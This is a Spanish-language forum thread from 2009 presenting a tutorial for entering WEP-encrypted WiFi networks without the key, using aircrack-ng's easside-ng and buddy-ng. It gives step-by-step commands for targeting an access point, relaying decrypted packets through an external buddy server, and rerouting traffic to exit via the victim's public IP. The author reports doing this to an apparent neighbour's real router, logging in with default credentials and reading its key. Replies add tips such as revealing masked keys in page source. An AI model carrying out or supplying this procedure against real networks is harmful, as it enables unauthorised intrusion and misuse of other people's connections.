Conexión WiFi + WEP sin necesidad de conocer la clave

Foro sobre todo tipo de tecnologías Wireless: Wi-Fi, Bluetooth, IrDA

Moderador: Moderadores

Conexión WiFi + WEP sin necesidad de conocer la clave

Notapor Vic_Thor » Vie Jun 12, 2009 5:58 am

COMO ACCEDER A UNA RED INALAMBRICA SIN CONOCER LA CLAVE WEP

Hola, el otro día vi un post de Sor_Zitroën acerca de una vulnerabilidad en redes inalámbricas protegidas con clave WPA, este:

http://www.wadalbertia.org/phpBB2/viewtopic.php?t=5124

Y me vino a la cabeza un ataque “diferente” contra redes con claves WEP.

Ya sabemos que son muy vulnerables, que el cifrado WEP tiene muchas debilidades y que al día de hoy con pocos minutos tenemos la clave de cifrado…. No?

Bueno, esto es diferente, esto es algo que no necesita ni dos minutos para llevar con éxito el ataque… y como “novedad” es que no es un crack de la clave WEP, sencillamente nos podremos conectar a una red inalámbrica con ese tipo de cifrado SIN CONOCER LA CLAVE!!!!

La verdad es que hace mucho tiempo que no me conecto por aquí y desconozco si habréis tocado este tema, he buscado en el foro y no vi post similares, pero si se me pasó… pues lo siento.

Para todo este tinglado vamos a usar dos herramientas que se incluyen en la suite de aircrack-ng (al menos en la última versión) son easside-ng y buddy-ng

Creo que no se compilan “por defecto” puesto que al igual que tkiptun-ng (el del ataque al cifrado WPA que hablaba Sor_Zitroën) son “algo” experimentales.

Así que lo primero a obtenerlas y compilarlas…

Descargamnos la suite de aircrack-ng

http://download.aircrack-ng.org/aircrac ... rc3.tar.gz

Y tras descomprimirlas compilamos mediante:

Código: Seleccionar todo
make unstable=true


de este modo tendremos disponibles para “jugar” las nuevas utilidades que son:

wesside-ng, easside-ng, buddy-ng y tkiptun-ng

En este post sólo nos van a interesar: easside-ng, buddy-ng

(En cuanto a [i]tkiptun-ng, ya os pondré un enlace con el código “retocado” para que funcione correctamente el ataque a las WPA, al menos a mi me funciona correctamente, pero eso será para otro post)[/i]

En fin, vamos a contar qué hacen estas “dos cosas” y luego preparamos el escenario de ejemplo…

Easside-ng es una herramienta “auto-mágica” que nos va a permitir comunicarnos con un punto de acceso sin necesidad de conocer la clave WEP.

Esta “proeza” la realiza sin intervención alguna por nuestra parte, vamos con poco mas que la sintaxis apropiada y nada mas…

El funcionamiento de easside-ng es el siguiente:
    • Primero: identifica una red wireless,
    • Segundo: procede a asociarse con ella
    • Tercero: obtiene el PRGA (del inglés “pseudo random generation algorithm”)
    • Cuarto: determina el rango de IPs de la red
    • Quinto: crea una interface TAP para poder comunicarse con el AP sin necesidad de conoCer la clave WEP.
Chulo verdad??

En fin, para conseguirlo necesita que el punto de acceso víctima des-encripte los paquetes por sí mismo y que luego nos los envíe a nuestro sistema, aquí es donde entra en juego buddy-ng.

Buddy se encargará de redirigir los paquetes descifrados al equipo que corre easside-ng y entonces ya podremos participar de la red con cifrado WEP sin mas, no sabemos la contraseña, pero estamos dentro.

Se han de reunir unas pocas condiciones para que esto funcione:
    • El punto de acceso víctima debe ser capaz de comunicarse con Internet. Vamos, lo mas habitual en los routers inalámbricos de casa….
    • Debe existir un servidor buddy accesible desde Internet, de otra forma el punto de acceso víctima no podría conectarse al mismo…
    • El servidor buddy utiliza los puertos 6969 de TCP y UDP por tanto hay que dejar pasar el tráfico en el firewall si es que existe,,,
    • El sistema que ejecuta easside-ng también ha de tener acceso a Internet y ser capaz de comunicarse con buddy.
Lo mejor sería disponer de dos máquinas, una con el Server buddy y otra diferente con easside, pero como imagino que eso no será posible en muchos casos, en este ejemplo usaremos buddy y easside en la misma máquina del atacante

Antes de comenzar el “asalto” y como me gusta hacerme de rogar y explicar bien las cosas, vamos a entender cómo funcionará este invento:

El tipo de ataque es similar al que realiza aireplay-ng por fragmentación, de hecho se basa en eso mismo, mas o menos así:
    • Se busca (o se indica por linea de comandos) el canal para que encuentre un red con clave WEP
    • Una vez encontrado, se autentica.
    • Cuando se ha autenticado intenta asociarse con el punto de acceso
    • Esnifa un paquete de datos,
    • Procede a descubrir al menos 1504 bytes de PRGA enviando “broadcasts” más grandes e interceptando los paquetes de respuesta (esto es el ataque de fragmentación)
    • El resultado se guarda en un archivo llamado: prga.log.
    • Se averigua la dirección IP de la red usando una técnica llamada “linear keystream expansion”.
    • Crea una conexión TCP permanente por el puerto 6969 con el servidor “buddy” y verifica la conectividad.
    • Envia ARP’s para obtener la dirección MAC del punto de acceso y la IP de origen.
    • Por defecto se usa .1 para el router y .123 para el cliente IP.
    • Entonces prueba la conexión con el punto de acceso y determina el rango de direcciones IP que usa.
    • Lista el tiempo que se tarda en obtener los paquetes de prueba esto nos dará una idea de la calidad de la conexión.
    • Se crea una interface TAP. Esto es una interface virtual que actuará como si se tratase de una tarjeta inalámbrica en la cual y si lo deseamos, podremos configurarla como si se tratase de una interface wifi “real

Por hacer una analogía sencilla, podríamos decir que es como un ataque del tipo MiTM de tal forma que se “interpone” un “amigo” (el servidor buddy) , algo así:

    Easside-ng esnifa los paquetes en la red wifi y comprueba que están encriptados.
    • Supongamos que el paquete va dirigido a google o a Hotmail o a cualquier sitio de Internet, por tanto, este paquete viaja bajo protocolo http puesto que Internet no usa WEP, dicho de otro modo, el punto de acceso debe desencriptar el paquete antes de enviarlo a Internet.
    • Lo que realmente se hace es retransmitir ese paquete y en lugar de enviarlo a su destino se lo enviará a nuestro servidor buddy en Internet.
    • El servidor buddy obtendrá ese paquete sin cifrado wep (recuerda que el punto de acceso ya lo densencriptó) y lo enviará de vuelta a nosotros.
Bueno, ciertamente no es el mismo el flujo de datos del tráfico saliente que el del entrante, pero no voy a enrollarme mas… imagino que como muchos de vosotros lo querréis probar, ya iremos aumentando el contenido teórico del ejercicio, por el momento nos vale con eso de que el servidor buddy se comportará como una máquina “en medio” de la red inalámbrica protegida por WEP.

Ahora vamos a “pintar” el escenario…

El atacante:

• Un router con salida a Internet y con los puertos 6969 de TCP y UDP abiertos y dirigidos hacia el equipo del atacante. EL rango de red que uso es 172.28.0.0/24 de forma que el router es la 172.28.0.1 y la ip de la máquina atacante es 172.28.0.101/24

Imagen

• La dirección IP pública del servidor buddy (que a la postre es la misma que la del router es: 88.27.187.80 (esto es importante puesto que mas adelante hay que indicarlo cunado usemos easside-ng

Imagen

Un pc-atacante con dirección IP 172.28.0.101 en el que correremos buddy-ng y easside-ng, se trata de un Linux con una live CD de Backtrack y con la versión de aircrack-ng compilada como indicamos al inicio (make ustable=true).

Lo ideal serían dos máquinas, como ya dijimos, ya veremos luego qué pasa con la tabla de rutas de la máquina atacante…y no sólo por eso, también por el rendimiento del equipo y de sus interfaces…

Veamos cómo está ese “atacante”:

La interface ethernet (eth0) que será donde estará escuchando buddy-ng

Imagen


Interface eth1 (la inalámbrica) por la que inyectaremos el tráfico con easside-ng

Imagen


Primero, vamos a poner en modo monitor la tarjeta wifi:

Imagen

Ahora vamos a lanzar en una shell airodump-ng para observar que tenemos al alcance, la orden ha sido:

Código: Seleccionar todo
airodump-ng -i eth1 -w test --encrypt wep -a


Imagen

Vemos que la red correspondiente con WLAN_78 tiene tráfico activo… así que vamos a fijar mas el objetivo… paramos airodump y lanzamos de nuevo este:

Código: Seleccionar todo
./airodump-ng -i eth1 -w test --encrypt wep -a -c 3 --bssid 00:1A:2B:15:73:D5


Imagen

Ok, ahora si que observamos mejor el tráfico de esa red… si quieres puedes dejar corriendo airodump, o lo paras, de hecho ya no lo necesitamos mas.

En otra shell, lanzamos buddy… esto no tiene mucho misterio.. sencillamente ejecutamos ./buddy-ng y veremos que se queda esperando la conexión…

Imagen

Ahora, en otra nueva shell ejecutamos easside-ng, de esta forma:

Código: Seleccionar todo
easside-ng -v 00:1A:2B:15:73:D5 -s 88.27.187.80 -f eth1 -c 3


-v es la MAC del Punto de acceso víctima tal como vimos en la salida de airodump

-s es la IP del servidor buddy, como todo está corriendo en el equipo del atacante, pues será la IP PÚBLICA!!! Del router del atacante.

-f es la interface inalámbrica en la que corre easside en el atacante, en nuestro caso eth1

-c 3 es el canal por el que emite el punto de acceso víctima (ver airodump)

Aparecerá algo así…
Imagen

Y tras unos segundos, algo similar a esto otro:

Imagen

En la pantalla anterior vemos muchas cosas interesantes….
    • IP local del punto de acceso víctima (192.168.1.1)
    • IP local asignada por la herramienta easside-ng (192.168.1.123)
    • IP del servidor buddy (88.27.187.80) esto ya lo sabíamos… es la nuestra
    • IP Pública del punto de acceso/router víctima: 80.31.68.212
No está mal… Si echamos un vistazo a lo que ocurre en la shell en la que escucha buddy deberíamos ver que la conexión se estableció con éxito:

Imagen

Es el momento de usar la interface TAP de la que hablamos antes…

Código: Seleccionar todo
modprobe tun
ifconfig at0 up


Imagen

Ahora, por esa interface ya podemos acceder a la red 192.168.1.0/24 que es la de nuestra víctima, si observamos la tabla de rutas en el equipo del atacante:

Imagen

Está claro… para ir a 192.168.1.0 se va por at0

Probando… navegamos a la ip 192.168.1.1 (el router víctima) y zas!!! La pantallita de autenticación, probamos las “de costumbre” y ale:

Imagen

Y la clave….

Imagen

Bueno… debería haber “difuminado” las mac’s, la redes, los essid, etc… me olvidé… así que si te sientes “identificado”, enhorabuena!!! Somos vecinos ;)

Como vimos antes en la tabla de rutas, para ir “hacia cualquier red” en este ejemplo nos vamos por la 172.28.0.1 que es el router del atacante… vamos que si queremos usar la conexión Wifi “saboteada” para conectarnos a Internet no podemos porque tenemos el Server buddy y easside en la misma máquina, por ejemplo, vamos a cualesmiip.com y veremos que estamos en Internet con nuestra IP.

Imagen

Si por el contrario hubiésemos puesto el Server budy en otra máquina en algún punto de Internet… veríamos que al navegar a la misma web salimos con la IP pública de la víctima:

Imagen

En fin, esto es todo…. Que lo disfruten… :D

Ahhh!!!! Que me olvidaba….

En el directorio donde se haya ejecutado easside se crea un archivo que se llama prga.log, si os decidís por lanzar el ataque a otro nuevo punto de acceso hay que eliminar ese archivo o fallaréis.

Ahora Sí… Byes.
Última edición por Vic_Thor el Lun Jun 22, 2009 7:47 pm, editado 1 vez en total
Vic_Thor
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 855
Registrado: Vie Ene 28, 2005 11:56 pm

Notapor Popolous » Vie Jun 12, 2009 10:13 am

Muchas gracias Vic por este interesantísimo aporte. Como siempre, me tengo que quitar el sombrero ante las cosas que sabes y la manera de contarlas.

Muy bien explicado y (creo) que lo he entendido bien. Ahora sólo hay que intentar ponerlo en práctica. Iba a hacer una pregunta, pero a riesgo de quedar como un tonto, voy a releerme el post y si sigo teniendo la duda, la plantearé.

Por cierto, no somos vecinos :badgrin:.

¡Saludos!
A. Einstein, cabello y violín,
hacemos nuestra última reverencia;
aunque sólo comprendido por dos personas,
él mismo y, a veces, Dios.

Jack C. Rosseter

"Sin direccionamiento Físico, no hay direccionamiento Lógico"

Vikingo dixit
Popolous
Wadalbertita
Wadalbertita
 
Mensajes: 1946
Registrado: Mié Ene 26, 2005 10:40 pm
Ubicación: E=mc^2

Notapor Vic_Thor » Vie Jun 12, 2009 11:21 am

Gracias a ti Popolous por tus comentarios...

A ver, el "truquillo" para salir a internet con la IP pública del router víctima (puesto que partimos del hecho que todo corre en la máquina del atacante) sería como este (hay otras formas, pero con la tabla de enrutamiento es sencillo y práctico)

Por un lado tenemos al server buddy escuchando en la dirección: 88.27.187.80 que es la nuestra (la del atacante)

Por otro lado tenemos que para salir a internet, segun la tabla de enrutamiento del equipo atacante dice que se va por la 172.28.0.1 que es la ip local del atacante y por ende andaremos por inet con nuestra ip pública.

Y por último, sabemos que la IP pública de la víctima es la 80.31.68.212 y su ip local la 192.168.1.1

Bien, primero crearemos rutas estáticas para acceder a las ip's públicas de la víctima y atacante:

Código: Seleccionar todo
route add -host 80.31.68.212 gw 172.28.0.1
route add -host 88.27.187.80 gw 172.28.0.1


Con esto nos aseguramos la conectividad entre el servidor buddy y easside

Ahora eliminamos la ruta por defecto que existía:

Código: Seleccionar todo
route del 0.0.0.0 netmask 0.0.0.0 gw 172.28.0.1


Y para finalizar creamos la nueva ruta por defecto, explicándole que para ir al resto del mundo se ha de hacer por at0 o por la ip 192.168.1.1

Código: Seleccionar todo
route add default gw 192.168.1.1


Y ya está, salimos a internet con la ip pública del punto de aceso/router víctima ;)

En ocasiones, hay "problemas" con las rutas añadidas para host, depende de las conexiones, si eso no te funciona bien puedes probar a sustituir este código:

Código: Seleccionar todo
route add -host 80.31.68.212 gw 172.28.0.1
route add -host 88.27.187.80 gw 172.28.0.1


Por este otro:

Código: Seleccionar todo
route add -net 80.31.68.0 netmask 255.255.255.0 gw 172.28.0.1
route add -net 88.27.187.0 netmask 255.255.255.0 gw 172.28.0.1


La desventaja es que habrá 510 ip's públicas a las que accederemos con nuestra ip, también puedes afinar mas con máscaras del tipo /30 si acaso no va lo del host... en fin, como ejemplo sirve.
Vic_Thor
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 855
Registrado: Vie Ene 28, 2005 11:56 pm

Notapor AnimAlf » Vie Jun 12, 2009 1:19 pm

Ohhhh, gracias :))........ ñam

Información pionera :)) ¿no estaremos a 6 de enero?

Es una vergüenza lo que hacen las compañias que suministran los accesos a la red. Podrían al menos informar en las pegatinas que ponen en sus aparejos, de que los users al menos pueden cambiar sus passwords. Que es que ... la verdad. A mi me da vergüenza. Paseas por cualquier lado, y lo que ves son los nombres de los puntos de acceso que dan por defecto las compañias ... pocos son los que cambian, por lo que tampoco cambian su protección ... Y VAMOS, NO SE. Si paseais por esta zona vereis mi ESSID: Canvieu a wpa2-psk + aes ... no se. Alguien tiene que avisar ... o mostrar de alguna forma agradecimiento. Pero, tampoco lo cambian ... no es que no sea de agradecer ... pero sabe mal

SaludOS
En busca del TuXeR perdido
Avatar de Usuario
AnimAlf
<|:-)
<|:-)
 
Mensajes: 628
Registrado: Mar Ago 08, 2006 4:54 am
Ubicación: tgn

Notapor Sor_Zitroën » Vie Jun 12, 2009 3:14 pm

Impresionante el curro :|

Muchas gracias por toda la información; ahora toca digerirla!!
[Padre] ¿Crees en el fracaso?
[Hijo] Sí
[Padre] Entonces lo experimentarás
Avatar de Usuario
Sor_Zitroën
-<|:·þ
-<|:·þ
 
Mensajes: 2064
Registrado: Vie Nov 25, 2005 2:01 am

Notapor vlan7 » Vie Jun 12, 2009 5:35 pm

Buen trabajo tio.

Bueno, lei por ahi que es posible usar easside-ng para acceder a la red wireless, y una vez ahi, simplemente abrir un navegador para logearse al AP. Probar passwords por defecto es de un exito peligrosamente mas alto de lo que parece.

Si estas dentro, puedes ver en la configuracion cual es la clave WEP. Y simplemente usarla para tener conexion a inet.

Segun el modelo de router, pueden aparecer asteriscos en los campos que componen la clave WEP. Con ver el codigo fuente HTML de la pagina es suficiente.

Gracias!
There is a crack, a crack in everything That's how the light gets in. -subculture

zen7.vlan7.org
Avatar de Usuario
vlan7
<|:-D
<|:-D
 
Mensajes: 1176
Registrado: Dom Mar 05, 2006 11:16 pm
Ubicación: Mas alla del EIP

Notapor neofito » Vie Jun 12, 2009 9:36 pm

Tienes un peligro ...!!! :lol: :lol:

Ahora en serio, muchas gracias por estos regalos que nos haces de vez en cuando.

Saludos
La verdad nos hara libres

http://neosysforensics.blogspot.com
http://www.wadalbertia.org
@neosysforensics
-<|:-P[G]
Avatar de Usuario
neofito
Wadalbertita
Wadalbertita
 
Mensajes: 1799
Registrado: Dom Ene 30, 2005 7:16 am
Ubicación: En algun lugar

Notapor Seifreed » Dom Jun 14, 2009 11:37 pm

Esto es la hostia!!
http://www.ecrime.pro
Avatar de Usuario
Seifreed
<|:-)
<|:-)
 
Mensajes: 707
Registrado: Mar Dic 19, 2006 5:41 pm

Notapor NeTTinG » Lun Jun 15, 2009 9:20 pm

Hola:

Muchas gracias por compartir con "el resto" todos los "trapos sucios" que descubres en tu laboratorio de investigación :p

Desde luego, se merece un post-it ;)

Un saludo.
| Blog NeTTinG | Proyecto Destripando iOS |
_____________________________
Todos somos muy ignorantes. Lo que ocurre es que no todos ignoramos las mismas cosas. (Albert Einstein)
Todos recaerán en la necesidad de conocer la única y presumible verdad que el gran embudo emana. (Sire Netting)
Avatar de Usuario
NeTTinG
Wadalbertita
Wadalbertita
 
Mensajes: 6272
Registrado: Mar Sep 20, 2005 5:54 pm
Ubicación: Bajo la trampilla del décimo primer piso.

Notapor Popolous » Mar Jun 16, 2009 10:22 am

NeTTinG escribió:
Desde luego, se merece un post-it ;)



Pues sí, a mí se me pasó hacerlo. Muchas gracias NeT ;)

¡Saludos!
A. Einstein, cabello y violín,
hacemos nuestra última reverencia;
aunque sólo comprendido por dos personas,
él mismo y, a veces, Dios.

Jack C. Rosseter

"Sin direccionamiento Físico, no hay direccionamiento Lógico"

Vikingo dixit
Popolous
Wadalbertita
Wadalbertita
 
Mensajes: 1946
Registrado: Mié Ene 26, 2005 10:40 pm
Ubicación: E=mc^2

Notapor disturb » Mar Jun 16, 2009 10:36 am

Muchas gracias Vic, curioso el ataque...
disturb
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 2253
Registrado: Mié Ene 26, 2005 5:30 pm
Ubicación: Málaga

Notapor SLaYeR » Mar Jun 16, 2009 2:19 pm

Joder... estoy de exámenes... no entro en una semana.... y va Vic_Thor y la lía!!!
Nada mas acabe me pongo con ello!! Eres un crack!
ImagenImagen "Happy Hacking". Richard Stallman

Cuando la oscuridad nuble tu mente, que la paranoia sea tu guía.

Déjate caer por mi blog
SLaYeR
-<|:·þ
-<|:·þ
 
Mensajes: 2022
Registrado: Lun Sep 12, 2005 9:02 pm
Ubicación: Cuando crees que me ves cruzo la pared...

Notapor NewLog » Mié Jun 17, 2009 12:38 am

Genial. Información genuina y de primera. Me encanta descubrir nuevas técnicas que no he leído por ningún otro sitio. Me encantan las perlas que vas dejando a tu paso!

En fin, un par de preguntas. Se que debería probarlo yo mismo, pero... en fin, estoy de exámenes y ya tendría que estar en el sobre!

1:
• El servidor buddy obtendrá ese paquete sin cifrado wep (recuerda que el punto de acceso ya lo densencriptó) y lo enviará de vuelta a nosotros.


Imagino que el servidor, una vez nos haya retransmitido el paquete, se encargará de enviarlo a su destino, no? Supongo que sí... porqué sino sería una buena chapuza ;)

2:

Qué pasaría si el servidor no tuviera el DHCP activado? Imagino que uno debería asignarle manualmente la ip, pero el invento seguiría funcionando? O el easside no sabría qué hacer? Sé que lo más normal es que el dhcp esté activado (no en mi red) pero quién sabe.

3:

Este mismo ataque, si las dos aplicaciones estuvieran preparadas para ello se podrían realizar con otros protocolos de seguridad (WPA,...)?



Por si quieres pulir aun más tu post, imagino que en:
./airodump-ng -i eth1 -w test --encrypt wpe -a -c 3 --bssid 00:1A:2B:15:73:D5

querías decir:
./airodump-ng -i eth1 -w test --encrypt wep -a -c 3 --bssid 00:1A:2B:15:73:D5


Una tonteria, vamos!

Buen apunte con lo del código html, vlan7.

En fin, voy a leer el otro hilo que has escrito :badgrin:

P.D.: Gracias por el segundo post explicando lo de las rutas. Siempre se agradecen estas cosas que parecen nimiedades, pero en realidad no lo son!
Avatar de Usuario
NewLog
<|:-D
<|:-D
 
Mensajes: 1130
Registrado: Sab Ene 14, 2006 1:03 am

Notapor Vic_Thor » Lun Jun 22, 2009 7:49 pm

"Pulido" ;) wpe --> wep

Thnx. NewLog
Vic_Thor
Gran Wadalbertita
Gran Wadalbertita
 
Mensajes: 855
Registrado: Vie Ene 28, 2005 11:56 pm

Notapor Raiden » Jue Jun 25, 2009 11:22 am

Ideal para empezar el veranito, znks una vez más Vic_Thor.
Avatar de Usuario
Raiden
:-)
:-)
 
Mensajes: 31
Registrado: Mié Nov 23, 2005 3:19 am
Ubicación: Enrutado

Siguiente

Volver a Zona Inalámbrica

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 3 invitados

cron